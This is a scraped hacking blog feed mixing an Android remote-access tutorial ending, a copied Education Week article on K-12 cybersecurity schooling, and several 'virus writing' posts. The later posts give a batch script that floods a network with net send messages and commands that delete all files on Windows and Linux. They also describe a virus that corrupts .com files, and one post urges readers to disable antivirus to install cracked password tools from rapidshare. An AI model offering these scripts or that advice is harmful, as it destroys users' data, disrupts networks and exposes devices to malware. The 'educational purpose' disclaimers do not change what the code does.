<b>Step7: </b>As soon as you open the app in the device, you can see the connected device in console terminal.</div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline;">
<img height="269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw9Vzy7VZuUXiZx__x-DWvgHNUYD3BT1oka96v3XNdLwoOOusetuOgMLWxaSVITqN4iHdEbHgpJb8Jr_InTE9BOtVt8lJjbSBCyG_helNUvAJCePujFQVI9xJ_hPjHhE1M_NypAU0z5cqs/s400/4.jpg" width="400" /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<b>Step8: </b>Now you have full access to the device from the terminal. Just type <span style="border: 0px; color: red; font-weight: bold; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">help </span>and you will be given with all the available commands.</div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline;">
<img height="269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKRZdXawy7E1x4a1z4yrolXy_RcdlebtYwMfQApDTVPFS8BuDh8W8mr2iK6dB-856mo2svPFDxG2GZP2-pIwREcGRPtpFelpZDMDKXEtIM6T71O2ufn7zjMD56Nc1zRmSzKAzk4SmFrUPh/s400/Screenshot+from+2015-01-23+11_22_07.png" width="400" /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
Congrats! you have successfully hacked an android device.</div>
<div style="background-color: white; border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="background-color: white; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<b style="color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px;">Note:</b><span style="color: #404040; font-family: "vollkorn" , sans-serif;"> Accessing other's device without their permission is completely illegal. This tutorial is for educational purpose only and never use it for any illegal purpose.</span><br />
<br />
<h3 style="border: 0px; clear: both; color: #404040; font-family: Bitter, serif; font-size: 1.6rem; margin: 0px 0px 1rem; outline: 0px; padding: 0px; vertical-align: baseline;">
How to avoid these kind of apps:</h3>
<div style="border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
From this tutorial you may have understood how easy it is to hack android devices. So to protect your self from being hacked you should check the app thoroughly before installing it. It is must to check app permissions before installing because the app cannot do anything without user's permission.</div>
<div style="border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">
<br /></div>
<div style="border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; text-align: center; vertical-align: baseline;">
<img height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggXMgLCHyx38h_IlMyqC4cpGIl2cRAijDObr9GVoC95acYRrklKBZHUuRzvHDLx0uuskSbbUuAOOTRzhZgVDTrT1OCtZwhPh_dcSZSATMLuAgq59bVNPxiSFQpfaLs-FTg17ahGUKDKbXe/s400/Screenshot_2015-01-23-12-11-35%5B1%5D.jpg" width="225" /></div>
<div style="border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
<br /></div>
<div style="border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
<br /></div>
<div style="border: 0px; color: #404040; font-family: Vollkorn, sans-serif; font-size: 16px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
<br /></div>
<div style="border: 0px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
<div class="post-body entry-content" id="post-body-740236683061642630" itemprop="description articleBody" style="border: 0px; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: 1.4; margin: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 635px;">
<div class="source-line" style="border: 0px; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: 1.3em; margin: 0px; padding: 0px; vertical-align: baseline;">
<div class="coverdate" style="border: 0px; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
<div class="gray-label-plain" style="border: 0px; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: 1.5em; margin: 0px 0px 20px; padding: 0px; vertical-align: baseline;">
<span itemprop="datePublished" style="border: 0px; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"></span><br />
<div class="source-line" style="border: 0px; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: 1.3em; margin: 0px; padding: 0px; vertical-align: baseline;">
<div class="source-line" style="border: 0px; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: 1.3em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span itemprop="datePublished" style="border: 0px; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span class="gray-label-plain pubprint" style="border: 0px; color: #333333; font-family: inherit; font-size: 10px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 10px; margin: 0px 0px 20px; padding: 0px 0px 11px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: #999999; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Source :</span></span></span><span style="border: 0px; color: #333333; font-family: inherit; font-size: xx-small; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: blue; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"> </span>Copyed on April 12, 2018 at </span><span class="gray-label-plain pubprint" style="border: 0px; color: #333333; font-family: inherit; font-size: 10px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 10px; margin: 0px 0px 20px; padding: 0px 0px 11px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; color: blue; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">www.</span></span></span><span style="border: 0px; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="color: blue; font-family: "verdana" , "arial" , "helvetica" , sans-serif;"><span style="font-size: 10px;"><b>letshacksomething.com</b></span></span></span></span></span></div>
<div class="source-line" style="border: 0px; color: #333333; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: 1.3em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span itemprop="datePublished" style="border: 0px; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-family: "verdana" , "arial" , "helvetica" , sans-serif; font-size: xx-small; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"> As an advanced reference material, please be able to visit the official website. Thank you</span></span></div>
</div>
<span itemprop="datePublished" style="border: 0px; font-stretch: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
</span></div>
</div>
</div>
</div>
</div>
</div>
Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-7402366830616426302018-04-12T06:36:00.003-07:002018-04-12T07:24:57.360-07:00With Hacking in Headlines, K-12 Cybersecurity Ed. Gets More Attention<br />
<img src="https://www.edweek.org/media/2017/03/21/25-cybersecurity-robot-build-600.jpg" /><br />
<span style="font-size: x-small;">Jennifer Langston, a freshman at Plain Dealing High School in Plain Dealing, La., is learning engineering and computer programming skills in a cyber-literacy class.</span><br />
<span style="font-size: x-small;">—Douglas Collier for Education Week</span><br />
<span style="font-size: x-small;">(<span style="color: blue;">Edweek.org</span>)</span><br />
<br />
<br />
By <a href="https://www.edweek.org/ew/contributors/benjamin.herold_6660808.html">Benjamin Herold</a><br />
March 21, 2017<br />
<br />
<br />
Amid a steady drumbeat of reports on cyber-espionage and election-related hackings, lawmakers are wrestling with questions of how to best protect the country from digital threats and address a severe shortage of skilled cybersecurity workers.<br />
<br />
That means new attention for nascent efforts to support cybersecurity education, including in K-12 schools. The National Governors Association, eight different federal agencies, and a national commission established by President Barack Obama are among those supporting a wide assortment of cybersecurity-related education and workforce-development initiatives.<br />
<br />
The administration of President Donald Trump has also been working on its own cybersecurity executive order, an early version of which would have mandated a sweeping review of the country's related education efforts.<br />
<br />
The idea is that both the public and private sectors need more people capable of designing, building, operating, and securing the information-technology systems that are now essential to the functioning of everything from small businesses to public utilities to the United States' national-security infrastructure. That requires a strong grounding in advanced mathematics and computer science, as well as specialized skills in fields as diverse as cryptography, software development, and network engineering.<br />
<br />
But there are challenges.<br />
<br />
Creating curricula and programs that can keep up with rapidly changing technologies isn't easy. Neither is squeezing another new obligation into schools' already-strained budgets and schedules. Efforts to stitch together the patchwork of existing cybersecurity-education efforts remain a work in progress.<br />
<br />
Lingering Tensions K-12 Connection Challenges Ahead "Cybersecurity is at the center of a lot of discussions right now, but we still have a lot of work to do," said Stephen Parker, the legislative director for education and workforce issues at the National Governors Association, which has made the issue a top priority this year.<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVPOtrsR39VG97ttzcndU4NmU5IzYVH6lRJWY5ZrWMxT13V0NvnwgtxPLBG46Ej5oBei5fK9auKdBUIS04ZOAdcsKQa5Qcr6psXRyKtLDSah6d5hF6tYY1cVFsJD31UHAPzXjve3H9vYM/s1600/Donation.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="301" data-original-width="720" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVPOtrsR39VG97ttzcndU4NmU5IzYVH6lRJWY5ZrWMxT13V0NvnwgtxPLBG46Ej5oBei5fK9auKdBUIS04ZOAdcsKQa5Qcr6psXRyKtLDSah6d5hF6tYY1cVFsJD31UHAPzXjve3H9vYM/s640/Donation.gif" width="640" /></a></div>
<br />
<br />
<div style="text-align: center;">
<a href="https://www.edweek.org/media/2017/03/21/25-cybersecurity-robot-build-students-280.jpg"><img border="0" src="https://www.edweek.org/media/2017/03/21/25-cybersecurity-robot-build-students-280.jpg" /></a></div>
<span style="font-size: x-small;"> Sophomore Jaylon Lucas, left, and freshman Joseph </span><br />
<span style="font-size: x-small;"> Williams assemble a Boe-Bot robot while attending </span><br />
<span style="font-size: x-small;"> a cyber literacy class at Plain Dealing High School </span><br />
<span style="font-size: x-small;"> in Louisiana.</span><br />
<span style="font-size: x-small;"> —Douglas Collier for Education Week</span><br />
<span style="font-size: x-small;"> (<span style="color: blue;">Edweek.org</span>) </span><br />
<br />
There's also an ongoing debate about whether cybersecurity education should prioritize national-security or workforce-development concerns.<br />
<br />
In January, the White House appeared headed in the former direction. President Donald Trump <a href="https://www.reuters.com/article/us-usa-trump-cyber-idUSKBN15E2TC">seemed poised</a> to sign an executive order that included a provision directing the U.S. secretaries of the departments of Defense and Homeland Security to review the country's cybersecurity education efforts and make recommendations for improvement, according to a draft published by <a href="https://apps.washingtonpost.com/g/documents/world/read-the-trump-administrations-draft-of-the-executive-order-on-cybersecurity/2306/">The Washington Post</a>. Trump put the order <a href="http://thehill.com/homenews/administration/317165-trump-scraps-signing-of-cybersecurity-executive-action">on hold</a>, however.<br />
<br />
Secretary of Homeland Security John Kelly later <a href="http://www.politico.com/story/2017/02/cyber-security-trump-approve-timing-234746">told Congress</a> the order had undergone significant revision. A later draft <a href="https://www.lawfareblog.com/revised-draft-trump-eo-cybersecurity">published by the Lawfare blog</a> eliminated altogether the provision related to education and workforce development.<br />
<br />
The resulting uncertainty is generating anxiety. Privacy advocates worry that civil liberties might suffer if national security agencies are put in charge of the country's cybersecurity education. Groups focused on private-sector-industry needs describe the country's shortage of skilled cybersecurity workers as a crisis that demands federal attention.<br />
<br />
Such tensions have ebbed and flowed for years.<br />
<br />
In December, <a href="https://www.nist.gov/cybercommission">a national cybersecurity commission</a> established by President Barack Obama sought to bridge the gap by <a href="https://www.nist.gov/sites/default/files/documents/2016/12/02/cybersecurity-commission-report-final-post.pdf">recommending</a> new public-private partnerships—both to better secure the country's information-technology infrastructure and to train 150,000 new cybersecurity workers.<br />
<br />
At all levels of government, related programmatic efforts have similarly attempted to straddle multiple worlds.<br />
<br />
In Washington, there are cybersecurity education and workforce-training initiatives supported by the departments of Education, Energy, Homeland Security, and Labor; the federal Office of Personnel Management; the National Security Agency; and the National Science Foundation, with the <a href="http://csrc.nist.gov/nice/">National Initiative for Cybersecurity Education</a> (NICE) at the National Institute for Standards and Technology in the federal Department of Commerce playing a coordinating role.<br />
<br />
At the state level, leaders such as John Hickenlooper, the Democratic governor of Colorado, and Rick Snyder, the Republican governor of Michigan, have also pushed forward their own cybersecurity initiatives. Numerous states now have cybersecurity-focused career-and-technical programs, as well as dual-enrollment programs that allow high school students to earn college credits by taking cybersecurity coursework at area colleges.<br />
<br />
And under the leadership of Virginia Gov. Terry McAuliffe, a Democrat, the National Governors Association last July launched a cybersecurity initiative dubbed <a href="https://ci.nga.org/cms/home/ci1617/index.html">"Meet the Threat."</a> The effort brings together educators and employers. One early outcome of their discussions: a shared desire to introduce computer-science education to young children, through coding games and competitions.<br />
<br />
Such opportunities in the K-12 arena are only going to grow, said Bert Steele, a consultant with the nonprofit <a href="https://cyberinnovationcenter.org/">Cyber Innovation Center</a>. "There's an absolute hunger to get this kind of content into the classroom," Steele said. "Everybody realizes how relevant it is in today's society."<br />
<br />
The Cyber Innovation Center was launched in 2007 to attract cybersecurity jobs and prepare cybersecurity workers in northwestern Louisiana.<br />
<br />
The center's founders quickly realized, however, that such initiatives would ultimately depend on K-12 schools. Their response was a project called the <a href="http://nicerc.org/">National Integrated Cyber Education Research Center</a>, which develops and shares cybersecurity lessons and resources with K-12 teachers around the country.<br />
<br />
Now funded by the federal Department of Homeland Security, the center's curricular materials have been approved by 17 states.<br />
<br />
At the high school level, for example, the group's "cyberliteracy" course blends civics lessons with hands-on activities involving robotics and computer programming. Students might use microcontrollers to build a robotic minesweeper, then take part in class discussions on constitutional privacy protections.<br />
<br />
"We need to make sure students know how to live and operate in cyberspace," said Kevin Nolten, the center's director of academic outreach. "That includes hard skills, like network programming and security, but also humanities, such as cyberlaw and ethics."<br />
<br />
It's just one of many cybersecurity education initiatives supported by several federal and state government agencies.<br />
<br />
At the federal level, for example, the National Science Foundation works with the Office of Personnel Management to provide <a href="https://nsf.gov/discoveries/disc_summ.jsp?cntn_id=136544&org=NSF&from=news">"CyberCorps"</a> scholarships to students training to become cybersecurity professionals, and with the National Security Agency, to fund free <a href="https://www.gen-cyber.com/">"GenCyber"</a> summer camps for K-12 students and teachers.<br />
<br />
The NSA also works with the Homeland Security Department to designate degree-granting cybersecurity programs at more than 200 colleges and universities as <a href="https://www.nsa.gov/resources/educators/centers-academic-excellence/cyber-defense/">Centers of Academic Excellence</a>.<br />
<br />
And DHS is involved in a number of other undertakings. The department, along with the National Institute of Standards and Technology at the Commerce Department, as well as the office of the secretary of defense, played a pivotal role in the development of the <a href="http://csrc.nist.gov/nice/framework/national_cybersecurity_workforce_framework_03_2013_version1_0_for_printing.pdf">NICE Cybersecurity Workforce Framework</a>, which provides a detailed breakdown of the skills required for a wide range of cybersecurity-related work. DHS also maintains an online directory of cybersecurity-training courses.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_VBYxR9m9OH6PdNzyv0aP1HKNJy0t8O_xKgWJ3h2865_dP4zxJMGPzCxhbhRy9Iy1yfom967BShEIgzwT4Fvwy4AYyHRfXmOtgFmyBp86U6WQCb26s5MgsavICLlEnfGNHNuBiS59IJk/s1600/Donation.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="301" data-original-width="720" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_VBYxR9m9OH6PdNzyv0aP1HKNJy0t8O_xKgWJ3h2865_dP4zxJMGPzCxhbhRy9Iy1yfom967BShEIgzwT4Fvwy4AYyHRfXmOtgFmyBp86U6WQCb26s5MgsavICLlEnfGNHNuBiS59IJk/s640/Donation.gif" width="640" /></a></div>
<br />
<br />
<div style="text-align: center;">
<a href="https://www.edweek.org/media/2017/03/21/25-cybersecurity-robot-detail-280.jpg"><img border="0" src="https://www.edweek.org/media/2017/03/21/25-cybersecurity-robot-detail-280.jpg" /></a></div>
<span style="font-size: x-small;"> A Boe-Bot is in the final stages of assembly. The robotic </span><br />
<span style="font-size: x-small;"> kits are used to help teach students programming and </span><br />
<span style="font-size: x-small;"> engineering skills needed for cybersecurity jobs.</span><br />
<span style="font-size: x-small;"> —Douglas Collier for Education Week</span><br />
<span style="font-size: x-small;"> (<span style="color: blue;">Edweek.org</span>)</span><br />
<br />
Despite all the activity, the scale and quality of K-12 cybersecurity education remains spotty.<br />
<br />
According to an analysis of national data by the nonprofit group Change the Equation, <a href="http://blogs.edweek.org/edweek/curriculum/2016/08/half_of_high_school_seniors_lack_access_computer_science.html">less than one-fourth</a> of high school seniors say they've ever taken a computer science course, let alone a more technical and highly specialized class focused on cybersecurity. Low-income, black, and Native American students are much less likely than Asian and white students to attend a school offering computer science.<br />
<br />
Staffing shortages are one big barrier to improvement, said Vince Bertram, the president and CEO of Project Lead the Way, a nonprofit that provides computer science curriculum to 4,000 K-12 schools across the country and plans to unveil a yearlong cybersecurity course for high schools in fall 2018.<br />
<br />
Another challenge is how quickly the cybersecurity field changes.<br />
<br />
The programming languages taught today may well be irrelevant by the time a current high schooler hits the job market.<br />
<br />
Emerging technologies such as autonomous vehicles also present new security threats. And the growing tension between privacy and security is only getting more pronounced: Should the focus of K-12 cybersecurity education be training students who can develop strong encryption systems capable of protecting users' privacy, even against government surveillance—or students who can crack consumer-encryption systems in the name of national security?<br />
<br />
It remains uncertain where the Trump administration will land on such questions. For the time being, it's not even clear when the president might move ahead with his cybersecurity plan, or if education and workforce issues will be included.<br />
<br />
Regardless of what happens in Washington, Bertram is among those pushing for cybersecurity education to proceed full steam ahead.<br />
<br />
"Cybersecurity is absolutely critical to our national security, and job growth is absolutely critical to our national economy," he said. "We should not need an executive order to create urgency around this work."<br />
<div>
<br /></div>
<div>
<br />
<div class="source-line" style="line-height: 1.3em; margin: 0px; padding: 0px;">
<div class="coverdate" style="margin: 0px; padding: 0px;">
<div class="gray-label-plain" style="line-height: 1.5em; margin: 0px 0px 20px; padding: 0px;">
<span itemprop="datePublished" style="margin: 0px; padding: 0px;"></span><br />
<div class="source-line" style="line-height: 1.3em; margin: 0px; padding: 0px;">
<div class="source-line" style="color: black; font-size: 9.84px; line-height: 1.3em; margin: 0px; padding: 0px;">
<div class="vol-issue-pages" style="font-size: 13.12px; margin-top: 15px; padding: 0px 0px 11px;">
<span itemprop="datePublished" style="margin: 0px; padding: 0px;"><span class="gray-label-plain" style="color: #949494; font-size: 10px; line-height: 10px; margin: 0px 0px 20px; padding: 0px;"><span style="font-family: inherit;">Vol</span><span style="font-family: "verdana" , "arial" , "helvetica" , sans-serif;">.</span><span itemprop="isPartOf" itemscope="" itemtype="http://schema.org/PublicationVolume" style="font-family: "verdana" , "arial" , "helvetica" , sans-serif; margin: 0px; padding: 0px;"><span itemprop="volumeNumber" style="margin: 0px; padding: 0px;"> 36</span></span><span style="font-family: "verdana" , "arial" , "helvetica" , sans-serif;">, Issue</span><span itemprop="isPartOf" itemscope="" itemtype="http://schema.org/PublicationIssue" style="font-family: "verdana" , "arial" , "helvetica" , sans-serif; margin: 0px; padding: 0px;"><span itemprop="issueNumber" style="margin: 0px; padding: 0px;"> 25</span></span><span style="font-family: "verdana" , "arial" , "helvetica" , sans-serif;">, Pages 1, 15</span></span></span></div>
<div style="font-family: verdana, arial, helvetica, sans-serif;">
<span itemprop="datePublished" style="margin: 0px; padding: 0px;"><span class="gray-label-plain pubprint" style="color: #949494; font-size: 10px; line-height: 10px; margin: 0px 0px 20px; padding: 0px 0px 11px;">Published in Print: March 22, 2017, as <strong style="margin: 0px; padding: 0px;">Cybersecurity Skills in Demand</strong></span></span></div>
</div>
<div class="source-line" style="color: black; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9.84px; line-height: 1.3em; margin: 0px; padding: 0px;">
<span itemprop="datePublished" style="margin: 0px; padding: 0px;"><span class="gray-label-plain pubprint" style="color: #949494; font-size: 10px; line-height: 10px; margin: 0px 0px 20px; padding: 0px 0px 11px;"><strong style="margin: 0px; padding: 0px;"><br /></strong></span></span></div>
<div class="source-line" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9.84px; line-height: 1.3em; margin: 0px; padding: 0px;">
<span itemprop="datePublished" style="margin: 0px; padding: 0px;"><span class="gray-label-plain pubprint" style="font-size: 10px; line-height: 10px; margin: 0px 0px 20px; padding: 0px 0px 11px;"><strong style="margin: 0px; padding: 0px;"><span style="color: #999999;">Source :</span></strong></span><span style="font-size: xx-small;"><span style="color: blue;"> </span>Copyed on April 12, 2018 at </span><span class="gray-label-plain pubprint" style="font-size: 10px; line-height: 10px; margin: 0px 0px 20px; padding: 0px 0px 11px;"><strong style="margin: 0px; padding: 0px;"><span style="color: blue;">www.e</span></strong></span><span style="font-size: xx-small;"><span style="color: blue;">dweek.org</span></span></span></div>
<div class="source-line" style="line-height: 1.3em; margin: 0px; padding: 0px;">
<span itemprop="datePublished" style="margin: 0px; padding: 0px;"><span style="font-family: "verdana" , "arial" , "helvetica" , sans-serif; font-size: xx-small;"> As an advanced reference material, please be able to visit the official website. Thank you</span></span></div>
</div>
<span itemprop="datePublished" style="margin: 0px; padding: 0px;">
</span></div>
</div>
</div>
</div>
Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-61336299603508460132018-04-10T21:44:00.002-07:002018-04-17T03:20:10.939-07:00Donation<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHuD19A3i8J_d18NuU5dcmqRnDSP3WZwnZ6189R7UcZg4dTVbk9RYfg2QWV7vp1_iCZOUUa4a4VArP20jlVa-HfAy0YplNcnX02VjYmkkXRXE6on4QQShmkQETwGOhMYfmIHEtoi4gmUs/s1600/Donation.gif" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="301" data-original-width="720" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHuD19A3i8J_d18NuU5dcmqRnDSP3WZwnZ6189R7UcZg4dTVbk9RYfg2QWV7vp1_iCZOUUa4a4VArP20jlVa-HfAy0YplNcnX02VjYmkkXRXE6on4QQShmkQETwGOhMYfmIHEtoi4gmUs/s640/Donation.gif" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Donation for Help Others</td></tr>
</tbody></table>
<br />Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com0tag:blogger.com,1999:blog-4589865437637964814.post-64901957782604369722015-01-22T05:34:00.003-08:002018-04-11T22:17:20.998-07:00Recover Lost Yahoo Password<br />
If you have ever used yahoo messenger on your comp. then you will get your password back. Though not 100% there is a very very high change. You can use one of the below software to recover your password.<br />
<br />
In case you have recently formated your system then chances of recovery seems to be very less.These are IM pssword recovary softwares.<br />
<br />
<br />
Trial downloads, only 4 chars reveled<br />
<br />
Spyware free !00% safe<br />
<br />
<br />
<a href="http://tinyurl.com/6emvx5">MessenPass 1.16</a> <br />
<br />
<br />
<a href="http://tinyurl.com/5rv7hn">Instant Messengers Password Recovery Master</a> <br />
<br />
<br />
<a href="http://tinyurl.com/57mdhe">Advanced Instant Messengers Password Recovery 3.4</a> <br />
<br />
<br />
Rapidshare downloads, <br />
<br />
no guarantee given may contain spyware and virus<br />
<br />
<br />
<a href="http://rapidshare.com/files/133325555/Yahoo.Messenger.Password.v2.0.370.Incl.Serial.rar">Yahoo.Messenger.Password.</a><br />
<br />
<br />
Note you need to turn off your antivirus(AV) before installing it as it may be considered as spyware by your AV.<br />
<div>
<br /></div>
<div>
<br /></div>
<div>
Source : <a href="http://viruswriting.blogspot.com/">http://viruswriting.blogspot.com/</a></div>
Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-68245242610246222602015-01-22T05:30:00.003-08:002018-04-11T22:17:52.752-07:00Virus Code 17: Flood Your NetworkThis is the virus writing basics section. Today we are going to show you on flodding the network. This is demonstrated using Dos/Batch programming.<br />
<br />
<br />
The below cade will temporarily flood network once the user turns off his comp everything will be back to normal.<br />
<br />
<br />
:CRASH<br />
<br />
net send * WORKGROUP ENABLED<br />
<br />
net send * WORKGROUP ENABLED<br />
<br />
GOTO CRASH<br />
<br />
Just copy the code into a notepad file and save it as anything.bat.When you run it will start flodding your network.<br />
<br />
As all the info given over here is purely for educational purpose it's readers responsibility to use it sensibly.<br />
<br />
For more tips select "virus writing" label/option from below<br />
<div>
<br /></div>
<div>
<br /></div>
<div>
Source : <a href="http://viruswriting.blogspot.com/">http://viruswriting.blogspot.com/</a></div>
Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-37862120407025457032015-01-22T05:28:00.000-08:002018-04-11T22:20:11.282-07:00Virus Code 20: Black Wolf VirusThis is the code of the "Black Wolf" virus.This is in c. You are at your own risk. If you spread this you will land behind the bar. We are giving this only for educational Purpose. You need to guess the header file for yourself.<br />
<br />
<br />
<img border="0" src="http://viruswritings.googlepages.com/blackwolf.GIF" /><br />
<br />
<br />
This virus corrupts all the .com files . so be extremely careful what you do with it.<br />
<div>
<br />
<div>
<br /></div>
<div>
Source : <a href="http://viruswriting.blogspot.com/">http://viruswriting.blogspot.com/</a></div>
<div>
<br /></div>
</div>
Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-55267578075749588402015-01-22T05:15:00.000-08:002018-04-11T22:20:49.457-07:00Virus Code 18: Delete All FilesThis is the virus wirting basics section. Today we are going to show you how to delete all content. This is demonstrated using DOS programming and also in LINUX.<br />
<br />
<br />
DOS programming<br />
<br />
Paste the given code in notepad<br />
<br />
@Echo off<br />
<br />
Del C:\ *.*y<br />
<br />
<br />
And save it like any_name.bat . Now run this file... All the data is gone from your PC.<br />
<br />
<br />
LINUX<br />
<br />
Just run the command<br />
<br />
rm *.* will delete all files of any extention<br />
<div>
<br /></div>
<div>
<br /></div>
<div>
Source : <a href="http://viruswriting.blogspot.com/">http://viruswriting.blogspot.com/</a></div>
